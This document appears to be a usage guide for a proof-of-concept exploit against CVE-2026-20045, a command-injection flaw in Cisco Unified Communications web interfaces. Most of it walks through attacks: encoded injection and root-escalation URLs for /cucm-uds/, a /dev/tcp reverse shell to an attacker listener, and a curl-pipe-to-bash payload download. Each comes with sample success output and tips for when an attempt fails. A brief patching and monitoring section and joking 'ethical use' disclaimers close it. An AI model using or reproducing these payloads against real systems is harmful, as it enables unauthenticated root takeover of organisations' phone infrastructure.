A critical remote code execution (RCE) vulnerability affecting multiple Cisco Unified Communications products. It was actively exploited in the wild before patches were released.
- 🚫 No authentication required
- 🖥️ Remote code execution
- 👑 Potential root-level access
- 🌍 Confirmed real-world exploitation
This means an attacker could fully take over affected systems remotely.
Here's a polished guide with usage examples for running the PoC script, including exactly what you'd see in your terminal if the exploit succeeds on a vulnerable Cisco Unified Communications target (unpatched web interface exposed). I've added some aesthetics with emojis, colored code blocks (via markdown), and structured sections for better readability. 😎
This runs simple commands to fetch user ID, username, and system details.
Command:
python3 CVE-2026-20045.py https://target-ucm:8443 "id && whoami && uname -a" What You'd See If It Works (Successful Output):
[*] Sending Stage 1 injection to: https://target-ucm:8443/cucm-uds/?query=JyA7IGlkICYmIHdob2FtaSAmJiB1bmFtZSAtYSAj
[*] Initial command: id && whoami && uname -a
[+] Stage 1 likely succeeded! Status: 200
[*] Sending Stage 2 escalation to: https://target-ucm:8443/cucm-uds/?escalate=c3VkbyAtaTsgaWQgJiYgd2hvYW1pICYmIHVuYW1lIC1h
[+] Stage 2 (root escalation) likely succeeded! Status: 200
[+] Possible command output:
------------------------------------------------------------
uid=0(root) gid=0(root) groups=0(root)
root
Linux ucm-server 5.15.0-89-generic #99-Ubuntu SMP Mon Oct 30 20:44:33 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
------------------------------------------------------------
🔑 Key Signs: Green [+] indicators, HTTP 200 status, and command results in the output block. If no output shows but status is 200, it still worked silently!
This spawns an interactive shell back to your machine. First, start a listener: nc -lvnp 4444.
Command:
python3 CVE-2026-20045.py https://target-ucm:8443 "bash -i >& /dev/tcp/YOUR_IP/4444 0>&1" What You'd See If It Works (In Script Terminal):
[*] Sending Stage 1 injection to: https://target-ucm:8443/cucm-uds/?query=JyA7IGJhc2ggLWkgPiYgL2Rldi90Y3AvWU9VUl9JUC80NDQ0IDAmPjEgIw==
[*] Initial command: bash -i >& /dev/tcp/YOUR_IP/4444 0>&1
[+] Stage 1 likely succeeded! Status: 200
[*] Sending Stage 2 escalation to: https://target-ucm:8443/cucm-uds/?escalate=c3VkbyAtaTsgYmFzaCAtaSA+JiAvZGV2L3RjcC9ZT1VSX0lQLzQ0NDQgMD4mMQ==
[+] Stage 2 (root escalation) likely succeeded! Status: 200
[+] Command executed silently (check target for effects)
What You'd See in Listener (nc) Terminal:
listening on [any] 4444 ...
connect to [YOUR_IP] from (UNKNOWN) [TARGET_IP] 54321
bash: cannot set terminal process group (1234): Inappropriate ioctl for device
bash: no job control in this shell
root@ucm-server:~# id
uid=0(root) gid=0(root) groups=0(root)
root@ucm-server:~#
🚀 Key Signs: Script shows success messages; listener gets an immediate root shell prompt. Type commands there to interact!
This downloads and runs a script from your server.
Command:
python3 CVE-2026-20045.py https://target-ucm:8443 "curl -s http://YOUR_SERVER/payload.sh | bash" What You'd See If It Works (Successful Output):
[*] Sending Stage 1 injection to: https://target-ucm:8443/cucm-uds/?query=JyA7IGN1cmwgLXMgaHR0cDovL1lPVVJfU0VSVkVSL3BheWxvYWQuc2ggfCBiYXNoICM=
[*] Initial command: curl -s http://YOUR_SERVER/payload.sh | bash
[+] Stage 1 likely succeeded! Status: 200
[*] Sending Stage 2 escalation to: https://target-ucm:8443/cucm-uds/?escalate=c3VkbyAtaTsgY3VybCAtcyBodHRwOi8vWU9VUl9TRVJWRVIvcGF5bG9hZC5zaCB8IGJhc2g=
[+] Stage 2 (root escalation) likely succeeded! Status: 200
[+] Command executed silently (check target for effects)
📥 Key Signs: 200 status codes; verify on the target (e.g., check logs/files) or your server (download logs). No direct output if the payload is silent.
💡 Pro Tips:
- Run with
sudoif needed for network privileges. - Use HTTPS targets; script handles self-signed certs.
- If it fails (e.g., 404/403), try other paths or check if the target is patched.
- Always test ethically! 😈
- ☎️ Cisco Unified Communications Manager (Unified CM)
- 🧑💼 Unified CM Session Management Edition (SME)
- 💬 IM & Presence Service
- 📞 Cisco Unity Connection
- ☁️ Webex Calling Dedicated Instance
Improper validation of user-supplied input in HTTP management interfaces, allowing command injection that leads to remote code execution.
- CVSS Score: 8.2 (High)
- Business Impact: Critical
- ⚡ Apply Cisco patches immediately
- 🔒 Restrict access to management interfaces
- 🌐 Avoid exposing systems directly to the internet
- 👀 Monitor logs for suspicious HTTP activity
- 🏛️ Follow government vulnerability remediation guidance if applicable
All PoC code is for ethical, educational use only on authorized systems. Unauthorized exploitation is illegal; no liability assumed for misuse. 😈